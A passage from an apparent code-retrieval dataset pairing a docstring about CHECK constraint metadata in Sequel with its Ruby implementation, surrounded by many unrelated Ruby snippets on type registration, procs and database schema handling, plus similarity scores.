add_conversion_proc(parser.oid, parser)\n\n if respond_to?(:register_array_type) && array_oid && array_oid > 0\n array_type_name = if type_schema\n \"#{type_schema}.#{type_name}\"\n else\n type_name\n end\n register_array_type(array_type_name, :oid=>array_oid, :converter=>parser, :scalar_typecast=>schema_type_symbol)\n end\n\n @row_types[literal(db_type)] = opts.merge(:parser=>parser, :type=>db_type)\n @row_schema_types[schema_type_string] = schema_type_symbol \n @schema_type_classes[schema_type_symbol] = ROW_TYPE_CLASSES\n @row_type_method_module.class_eval do\n meth = :\"typecast_value_#{schema_type_symbol}\"\n define_method(meth) do |v|\n row_type(db_type, v)\n end\n private meth\n alias_method(meth, meth)\n end\n\n nil\n end",
"def map_primitive(name, ident, &block)\n lang_eval do\n @prim_ident[name.to_sym] = ident.to_s\n @prim_to_lit[name.to_sym] = block\n end\n nil\n end",
"def register(name, &block)\n transformations[name] = block\n end",
"def __typedeaf_handle_nested_block(parameters, args, block)\n if block && parameters[:block]\n args << block\n end\n return nil\n end",
"def add_pg_decoders\n if @config[:use_follower_reads_for_type_introspection]\n @default_timezone = nil\n @timestamp_decoder = nil\n\n coders_by_name = {\n \"int2\" => PG::TextDecoder::Integer,\n \"int4\" => PG::TextDecoder::Integer,\n \"int8\" => PG::TextDecoder::Integer,\n \"oid\" => PG::TextDecoder::Integer,\n \"float4\" => PG::TextDecoder::Float,\n \"float8\" => PG::TextDecoder::Float,\n \"numeric\" => PG::TextDecoder::Numeric,\n \"bool\" => PG::TextDecoder::Boolean,\n \"timestamp\" => PG::TextDecoder::TimestampUtc,\n \"timestamptz\" => PG::TextDecoder::TimestampWithTimeZone,\n }\n\n known_coder_types = coders_by_name.keys.map { |n| quote(n) }\n query = <<~SQL % known_coder_types.join(\", \")\n SELECT t.oid, t.typname\n FROM pg_type as t AS OF SYSTEM TIME '-10s'\n WHERE t.typname IN (%s)\n SQL\n\n coders = execute_and_clear(query, \"SCHEMA\", []) do |result|\n result\n .map { |row| construct_coder(row, coders_by_name[row[\"typname\"]]) }\n .compact\n end\n\n map = PG::TypeMapByOid.new\n coders.each { |coder| map.add_coder(coder) }\n @connection.type_map_for_results = map\n\n @type_map_for_results = PG::TypeMapByOid.new\n @type_map_for_results.default_type_map = map\n @type_map_for_results.add_coder(PG::TextDecoder::Bytea.new(oid: 17, name: \"bytea\"))\n @type_map_for_results.add_coder(MoneyDecoder.new(oid: 790, name: \"money\"))\n\n # extract timestamp decoder for use in update_typemap_for_default_timezone\n @timestamp_decoder = coders.find { |coder| coder.name == \"timestamp\" }\n update_typemap_for_default_timezone\n else\n super\n end\n rescue ActiveRecord::StatementInvalid => e\n raise e unless e.cause.is_a? PG::InvalidCatalogName\n # use original if database is younger than 10s\n super\n end",
"def sproc_type=(type)\n @sproc_type = type\n @opts[:sql] = ''\n end",
"def resolve_type(type, object, ctx = :__undefined__)\n check_resolved_type(type, object, ctx) do |ok_type, ok_object, ok_ctx|\n if @resolve_type_proc.nil?\n raise(NotImplementedError, \"Can't determine GraphQL type for: #{ok_object.inspect}, define `resolve_type (type, obj, ctx) -> { ... }` inside `Schema.define`.\")\n end\n @resolve_type_proc.call(ok_type, ok_object, ok_ctx)\n end\n end",
"def register_postprocessor(mime_type, klass, proc = nil, &block)\n proc ||= block\n mutate_hash_config(:postprocessors, mime_type) do |processors|\n processors.push(wrap_processor(klass, proc))\n processors\n end\n end",
"def set_type(name)\n @type = name\n ProcessRecord::TYPE_TABLE[name] = self\n end",
"def type_from_object( object, block=nil )\n\t\tcase object\n\t\twhen Module\n\t\t\tself.log.debug \"Deriving a type from module %p\" % [ object ]\n\t\t\treturn self.type_from_module( object )\n\n\t\twhen Method, UnboundMethod\n\t\t\tself.log.debug \"Deriving a type from method %p\" % [ object ]\n\t\t\treturn self.type_from_method( object )\n\n\t\twhen Array\n\t\t\tself.log.debug \"Deriving a type from context %p\" % [ object ]\n\t\t\treturn self.type_from_context( *object )\n\n\t\twhen Proc\n\t\t\tself.log.debug \"Deriving a type from context proc %p\" % [ object ]\n\t\t\treturn self.type_from_context_proc( object )\n\n\t\twhen String\n\t\t\tself.log.debug \"Using string %p as type\" % [ object ]\n\t\t\treturn object\n\n\t\telse\n\t\t\traise \"don't know how to derive an event type from a %p\" % [ object.class ]\n\t\tend\n\tend",
"def bind_name(name, type)\n @names[name.to_sym] = type unless name.nil?\n end",
"def cpptype2(generic_type)\n CPLUSPLUS_TYPES2[generic_type] || camelcasetype(generic_type)\nend",
"def add_attribute_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@attribute_conversions[ oid ] = conversion\n\tend",
"def add_converter(var_name, const, name = nil, &converter)\n if name.nil? # custom converter\n instance_variable_get(var_name) << converter\n else # named converter\n combo = const[name]\n case combo\n when Array # combo converter\n combo.each do |converter_name|\n add_converter(var_name, const, converter_name)\n end\n else # individual named converter\n instance_variable_get(var_name) << combo\n end\n end\n end",
"def datatype(name, params, block, type_params, &type_block)\n define name, params, block, { :using => DataType }.merge(type_params) do\n #p [:self, __doodle__.__inspect__]\n #p [:checking_values, values, values.class]\n if respond_to?(:values)\n if values.kind_of?(Range)\n must \"be in range #{values}\" do |s|\n values.include?(s)\n end\n # array of values\n elsif values.respond_to?(:size) && values.size > 0\n must \"be one of #{values.join(', ')}\" do |s|\n values.include?(s)\n end\n end\n end\n if respond_to?(:match) && match\n must \"match pattern #{match.inspect}\" do |s|\n #p [:matching, s, da.match.inspect]\n s.to_s =~ match\n end\n end\n instance_eval(&type_block) if type_block\n end\n end",
"def block_to_proc(&p)\n\tp.call\nend",
"def to_type()\n callables = dispatchers.map do | dispatch |\n t = Puppet::Pops::Types::PCallableType.new()\n # TODO: handle that dispatch.type may be an ArrayType instead of a TupleType\n t2 = dispatch.type\n t.param_types = Puppet::Pops::Types::TypeCalculator.copy_as_tuple(t2)\n # TODO: Function does not have a block type yet\n t\n end\n if callables.size > 1\n # multiple signatures, produce a Variant type of Callable1-n\n t = Puppet::Pops::Types::PVariantType.new()\n t.types = callables\n t\n else\n # single signature, produce single Callable\n callables.pop\n end\n end",
"def block(name, &block)\n klass = SuperbTextConstructor.block(name, &block)\n @blocks << klass\n klass\n end",
"def visit_blob(binding_type)\n #TODO: consider moving the conversion right in here.\n self.result = binding_type.to_ruby(input)\n end",
"def register_spec_type *args, &block\n if block then\n matcher, klass = block, args.first\n else\n matcher, klass = *args\n end\n TYPES.unshift [matcher, klass]\n end",
"def resolve_type(type, object, ctx = :__undefined__)\n check_resolved_type(type, object, ctx) do |ok_type, ok_object, ok_ctx|\n if @resolve_type_proc.nil?\n raise(GraphQL::RequiredImplementationMissingError, \"Can't determine GraphQL type for: #{ok_object.inspect}, define `resolve_type (type, obj, ctx) -> { ... }` inside `Schema.define`.\")\n end\n @resolve_type_proc.call(ok_type, ok_object, ok_ctx)\n end\n end",
"def on(type, &block)\n callbacks[type.to_sym] ||= []\n callbacks[type.to_sym] << block\n end",
"def default_handler(&block)\n type_handles.default = (block || lambda {|*args, &block| })\n end",
"def add(name, &block)\n blocks[name.to_sym] = block\n end",
"def add_block(block)\n return if ilp.has_variable?(block)\n ilp.add_variable(block)\n lhs = block_frequency(block) + [[block, -1]]\n ilp.add_constraint(lhs,\"equal\",0,\"block_#{block.qname}\", :structural)\n end",
"def convert_signature symbol, in_type, out_type\r\n [ symbol.to_s.sub(\"niScope\", \"rbScope\").to_sym,\r\n in_type.map{|t| types[:ruby][t] || t },\r\n out_type\r\n ]\r\n end",
"def convert_type(type)\n return TYPE_CONVERTER[type]\n end",
"def type\n if @type.is_a?(Proc)\n # lazy-eval it\n @type = @type.call\n end\n @type\n end",
"def convert_text_column_storage_type(table_name, column_name, to_type, temp_column_name)\n quoted_table_name = quote_table_name(table_name)\n orig_col = quote_column_name(column_name)\n temp_col = quote_column_name(temp_column_name || 'oee_temp_col')\n cmds = <<-SQL\n alter table #{quoted_table_name} add #{temp_col} #{to_type}\n update #{quoted_table_name} set #{temp_col} = #{orig_col}\n alter table #{quoted_table_name} drop column #{orig_col}\n alter table #{quoted_table_name} rename column #{temp_col} to #{orig_col}\n SQL\n cmds.split(\"\\n\").map(&:strip).each{|cmd| execute cmd}\n end",
"def resolve_type(type)\n (@udts ||= {})[type] ||= begin\n sql = <<-sql\n SELECT st.name AS storage_type\n FROM systypes s, systypes st\n WHERE s.type = st.type\n AND st.name NOT IN ('longsysname', 'nchar', 'nvarchar', 'sysname', 'timestamp')\n AND s.name = '#{type}'\n sql\n\n select_one(sql, \"Field type for #{type}\")['storage_type'].strip\n end\n end",
"def lookup_cpptype(t) t = @@typemap[t] and return t end",
"def add_type\n @item.type = bibtex_type\n end",
"def process_type_or_module(obj, parent)\n @first_comment ||= Digest::MD5.hexdigest(obj.comment) if obj.comment\n type = obj.is_module? ? :modules : :classes\n # One important note about the code_objects.rb structure. A class or module\n # definition can be spread a cross many files in Ruby so code_objects.rb handles\n # this by keeping only *one* reference to each class or module that has a definition\n # at the root level of a file (ie. not contained in another class or module).\n # This means that when we are processing files we may run into the same class/module\n # twice. So we need to keep track of what classes/modules we have\n # already seen and make sure we don't create two INSERT statements for the same\n # object.\n if(!@already_processed.has_key?(obj.full_name)) then \n parent = CodeContainer.find_by_name(parent.name) || CodeContainer.find_by_name(parent.file_relative_name)\n p = case type\n when :modules\n \n CodeModule.create_or_update_by_name_and_code_container_id(:code_container_id => parent.try(:id), :name => obj.name, :full_name => obj.full_name, :superclass => obj.superclass, :line_code => (MODULES[@file.file_absolute_name][obj.full_name][:line] if MODULES[@file.file_absolute_name]))\n when :classes\n \n CodeClass.create_or_update_by_name_and_code_container_id(:code_container_id => parent.try(:id), :name => obj.name, :full_name => obj.full_name, :superclass => obj.superclass, :line_code => (CLASSES[@file.file_absolute_name][obj.full_name][:line] if CLASSES[@file.file_absolute_name]))\n end\n comment = CodeComment.create_or_update_by_owner_id_and_owner_type :exported_body => obj.comment, :owner_id => p.id, :owner_type => p.class unless obj.comment.blank?\n @containers << p.id\n @comments << comment.id if comment\n\n @already_processed[obj.full_name] = true \n \n # Process all of the objects that this class or module contains\n obj.method_list.each { |child| process_method(child, obj) }\n obj.aliases.each { |child| process_alias(child, obj) }\n obj.constants.each { |child| process_constant(child, obj) }\n obj.requires.each { |child| process_require(child, obj) }\n obj.includes.each { |child| process_include(child, obj) }\n obj.attributes.each { |child| process_attribute(child, obj) } \n end\n \n id = @already_processed[obj.full_name]\n # Recursively process contained subclasses and modules \n obj.each_classmodule do |child| \n \tprocess_type_or_module(child, obj) \n end\n \n end",
"def procasaurus( &block )\n\tputs \"I am a procasaurus.\"\n\tputs block.class\n\t# note the proc must be the last parameter and must start with ampersand\nend",
"def resolve_type(object)\n instance_exec(object, &@resolve_type_proc)\n end",
"def create_processor_for_type(parameter_name, parameter_type, parameter_required)\n attributes_processors = create_attributes_processors_for_type(parameter_type)\n Sinatra::SwaggerExposer::Processing::SwaggerTypeValueProcessor.new(\n parameter_name,\n parameter_required,\n attributes_processors\n )\n end",
"def to_proc\n name, options, registry, variable_name = @name, @options, @registry, @iv_name\n Proc.new do\n build name => options\n registry.inject(instance_variable_get(:\"@#{variable_name}\")) do |value, (method, args, block)|\n value.send(method, *args, &block)\n end\n end\n end",
"def display_proc(&block)\n #defined by default_for_proc_type in initialize!\n end",
"def type_cast_code_with_patch(var_name)\n klass = self.class.name\n case type\n when /array$/\n base_type = type.to_s.gsub(/_array/, '')\n \"#{var_name}.from_postgres_array(:#{base_type.parameterize('_')})\"\n when :inet, :cidr\n \"#{klass}.cidr_to_string(#{var_name})\"\n else\n type_cast_code_without_patch(var_name)\n end\n end",
"def type(node, type); end",
"def register(type_name, klass = nil, **options, &block)\n registry.register(type_name, klass, **options, &block)\n end",
"def add_type(mod) #:nodoc:\n @t[mod] ||= Type.new(mod)\n end",
"def type_to_sql(*args); connection.type_to_sql(*args); end",
"def add_type(type)\n\n # nothing to be done\n end",
"def add_type(type)\n\n # nothing to be done\n end",
"def type_literal_generic_symbol(column)\n type_literal_generic_string(column)\n end",
"def writer_proc(&block)\n #defined by default_for_proc_type in initialize!\n end",
"def add_filter(type, &block)\n filters[type] << block\n end",
"def type(key, &blk)\n call_command(['type', key], &blk)\n end",
"def register_convertor(convertor_name, convertor_class)\n @registered_convertors[convertor_name] = convertor_class\n end",
"def sig(&block)\n HasType.set_last_proc(self, block)\n end",
"def machine_type(name, number, range=nil)\n machine_type = MachineType.new(name, number, range)\n @machine_types << machine_type\n # generates a method with given machine type name in a module\n # this module is included in Parameter class so machine type dependencies can be\n # given with machine type names (in DSL) instead of binary numbers\n ParameterMachineTypeBridge.send(:define_method, name) do\n machine_type.binary_number\n end\n end",
"def set_block_type\n @block_type = BlockType.find(params[:id])\n end",
"def lookup_cpptype(name)\n if t = root.lookup_cpptype(name) then return t \n elsif c = containing_class.typechild(name) then return c.cpptype\n elsif c= root.dotted_typechild(name) then return c.cpptype\n else raise \"Cannot resolve type-name #{name} from #{self}\" \n end\n end",
"def map_type type\n type\n end",
"def map_type type\n type\n end",
"def register_bundle_processor(mime_type, klass, &block)\n expire_index!\n\n if block_given?\n name = klass.to_s\n klass = Class.new(Processor) do\n @name = name\n @processor = block\n end\n end\n\n @bundle_processors[mime_type].push(klass)\n end",
"def set_type sym, type\n @types[sym] = type\n end",
"def each_type(&block)\n if block_given?\n @types.each_value(&block)\n self\n else\n @types.values\n end\n end",
"def add_virtual_column(name, type = :string)\n virtual_columns[name.to_sym] = {\n :type => type\n }\n end"
] |
[
"0.69109946",
"0.6309396",
"0.5923431",
"0.5917636",
"0.5862878",
"0.57383573",
"0.5684644",
"0.55541337",
"0.5495757",
"0.54407096",
"0.54395115",
"0.54209137",
"0.53729755",
"0.53537726",
"0.5343672",
"0.533057",
"0.523242",
"0.5228982",
"0.5200437",
"0.5194037",
"0.51849186",
"0.5154962",
"0.50964993",
"0.5096045",
"0.5093398",
"0.5004211",
"0.49915305",
"0.4944266",
"0.4938597",
"0.4935608",
"0.4935608",
"0.49091476",
"0.48555166",
"0.48447168",
"0.4842543",
"0.48412254",
"0.48310792",
"0.48308432",
"0.48094928",
"0.48077783",
"0.48012903",
"0.4784302",
"0.47807294",
"0.4754139",
"0.47362792",
"0.47213686",
"0.4719029",
"0.47089586",
"0.47064704",
"0.47056472",
"0.4701297",
"0.469232",
"0.4687743",
"0.46867588",
"0.46494487",
"0.4630579",
"0.4629083",
"0.4615887",
"0.45912275",
"0.45907217",
"0.45723265",
"0.45667386",
"0.4560916",
"0.45588344",
"0.4551602",
"0.45387918",
"0.45385084",
"0.45302218",
"0.45212072",
"0.45209172",
"0.4501617",
"0.4500173",
"0.4499655",
"0.44986567",
"0.4495654",
"0.4494342",
"0.4494323",
"0.44920585",
"0.44878617",
"0.4485109",
"0.4475799",
"0.44621518",
"0.44531444",
"0.44522792",
"0.44522792",
"0.4451651",
"0.44453534",
"0.4442064",
"0.44416735",
"0.44413954",
"0.44341144",
"0.44315976",
"0.44299936",
"0.4429866",
"0.44292367",
"0.44292367",
"0.44231266",
"0.44218862",
"0.44185516",
"0.44175184"
] |
0.8404523
|
0
|
A hash of metadata for CHECK constraints on the table. Keys are CHECK constraint name symbols. Values are hashes with the following keys: :definition :: An SQL fragment for the definition of the constraint :columns :: An array of column symbols for the columns referenced in the constraint, can be an empty array if the database cannot determine the column symbols.
|
def check_constraints(table)
m = output_identifier_meth
hash = {}
_check_constraints_ds.where_each(:conrelid=>regclass_oid(table)) do |row|
constraint = m.call(row[:constraint])
entry = hash[constraint] ||= {:definition=>row[:definition], :columns=>[]}
entry[:columns] << m.call(row[:column]) if row[:column]
end
hash
end
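
A minimal usage sketch of the hash shape described above (illustrative only: the accounts table, its balance column, and the positive_balance constraint name are hypothetical, not from the source):

DB.create_table(:accounts) do
  primary_key :id
  Integer :balance
  constraint(:positive_balance){balance >= 0}  # named CHECK constraint
end

DB.check_constraints(:accounts)
# => {:positive_balance=>{:definition=>"CHECK ((balance >= 0))", :columns=>[:balance]}}
# The exact :definition string comes from pg_get_constraintdef and may vary by PostgreSQL version.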
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def constraint_definition_sql(constraint)\n sql = String.new\n sql << \"CONSTRAINT #{quote_identifier(constraint[:name])} \" if constraint[:name] \n case constraint[:type]\n when :check\n check = constraint[:check]\n check = check.first if check.is_a?(Array) && check.length == 1\n check = filter_expr(check)\n check = \"(#{check})\" unless check[0..0] == '(' && check[-1..-1] == ')'\n sql << \"CHECK #{check}\"\n when :primary_key\n sql << \"#{primary_key_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << column_references_table_constraint_sql(constraint.merge(:deferrable=>nil))\n when :unique\n sql << \"#{unique_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n else\n raise Error, \"Invalid constraint type #{constraint[:type]}, should be :check, :primary_key, :foreign_key, or :unique\"\n end\n constraint_deferrable_sql_append(sql, constraint[:deferrable])\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n sql << \"CHECK #{filter_expr(constraint[:check])}\"\n sql\n end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map(&:inspect).join(', ')}\"\n end\n when :foreign_key\n c.delete(:on_delete) if c[:on_delete] == :no_action\n c.delete(:on_update) if c[:on_update] == :no_action\n c.delete(:deferrable) unless c[:deferrable]\n cols = c.delete(:columns)\n table = c.delete(:table)\n \"#{type} #{cols.inspect}, #{table.inspect}#{opts_inspect(c)}\"\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map{|x| x.inspect}.join(', ')}\"\n end\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def conditions_from_constraints\n hash_conditions = {}\n conditions = [hash_conditions]\n active_scaffold_constraints.each do |k, v|\n column = active_scaffold_config.columns[k]\n if column\n # Assume this is a multi-level association constraint.\n # example:\n # data model: Park -> Den -> Bear\n # constraint: :den => {:park => 5}\n if params_hash? v\n far_association = column.association.klass.reflect_on_association(v.keys.first)\n field = far_association.klass.primary_key\n table = far_association.table_name\n\n active_scaffold_references.concat([{k => far_association.name}]) # e.g. {:den => :park}\n hash_conditions.deep_merge!(table => {field => v.values.first})\n\n # association column constraint\n elsif column.association\n join_from_association_constraint(column)\n hash_conditions.deep_merge!(condition_from_association_constraint(column.association, v))\n\n # regular column constraints\n elsif column.searchable? && params[column.name] != v\n active_scaffold_references.concat column.references if column.includes.present?\n conditions << [column.search_sql.collect { |search_sql| \"#{search_sql} = ?\" }.join(' OR '), *([v] * column.search_sql.size)]\n end\n # unknown-to-activescaffold-but-real-database-column constraint\n elsif active_scaffold_config._columns_hash[k.to_s] && params[column.name] != v\n hash_conditions.deep_merge!(k => v)\n else\n raise ActiveScaffold::MalformedConstraint, constraint_error(active_scaffold_config.model, k), caller\n end\n end\n conditions.reject(&:blank?)\n end",
"def column_definition_sql(column)\n return constraint_definition_sql(column) if column[:type] == :check\n sql = \"#{quote_identifier(column[:name])} #{type_literal(TYPES[column[:type]])}\"\n column[:size] ||= 255 if column[:type] == :varchar\n elements = column[:size] || column[:elements]\n sql << literal(Array(elements)) if elements\n sql << UNSIGNED if column[:unsigned]\n sql << UNIQUE if column[:unique]\n sql << NOT_NULL if column[:null] == false\n sql << NULL if column[:null] == true\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n sql << PRIMARY_KEY if column[:primary_key]\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n if column[:table]\n sql << \" REFERENCES #{quote_identifier(column[:table])}\"\n sql << \"(#{quote_identifier(column[:key])})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n end\n sql\n end",
"def column_definition_sql(column)\n return constraint_definition_sql(column) if column[:type] == :check\n sql = \"#{quote_identifier(column[:name])} #{type_literal(column)}\"\n sql << UNIQUE if column[:unique]\n sql << NOT_NULL if column[:null] == false\n sql << NULL if column[:null] == true\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n sql << PRIMARY_KEY if column[:primary_key]\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n sql << column_references_sql(column) if column[:table]\n sql\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def column_definition_sql(column)\n return constraint_definition_sql(column) if column[:type] == :check\n sql = \"#{quote_identifier(column[:name])} #{type_literal(column)}\"\n sql << UNIQUE if column[:unique]\n sql << NOT_NULL if column[:null] == false\n sql << NULL if column[:null] == true\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n sql << PRIMARY_KEY if column[:primary_key]\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n sql << column_references_sql(column) if column[:table]\n sql\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end",
"def descriptions\n\t\treturn self.constraints.each_with_object({}) do |(field,constraint), hash|\n\t\t\thash[ field ] = constraint.description\n\t\tend\n\tend",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = {}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def crdb_column_definitions(table_name)\n fields = \\\n query(<<~SQL, \"SCHEMA\")\n SELECT c.column_name, c.column_comment, c.crdb_sql_type, c.is_hidden::BOOLEAN\n FROM information_schema.columns c\n WHERE c.table_name = #{quote(table_name)}\n SQL\n\n fields.reduce({}) do |a, e|\n a[e[0]] = e\n a\n end\n end",
"def build_constraints\n Schema::Logical::Constraint.new\n end",
"def column_definition_references_sql(sql, column)\n if column[:table]\n if name = column[:foreign_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << column_references_column_constraint_sql(column)\n end\n end",
"def to_dump(opts={})\n dump = \"\"\n dump << \"add_column_check_constraint #{table_name.to_s}, #{column_name.to_s}\" unless opts[:inline]\n dump << \", check: #{check.inspect}\"\n dump << \"\\n\"\n dump\n end",
"def column_references_sql(column)\n sql = String.new\n sql << \" REFERENCES #{quote_schema_table(column[:table])}\"\n sql << \"(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(', ')})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n sql << \" ON UPDATE #{on_update_clause(column[:on_update])}\" if column[:on_update]\n constraint_deferrable_sql_append(sql, column[:deferrable])\n sql\n end",
"def column_list_sql(generator)\n (generator.columns.map{|c| column_definition_sql(c)} + generator.constraints.map{|c| constraint_definition_sql(c)}).join(', ')\n end",
"def hdf_descriptions(config_rule)\n [\n {\n label: 'check',\n data: check_text(config_rule)\n },\n ]\n end",
"def known_rules\n @table.keys\n end",
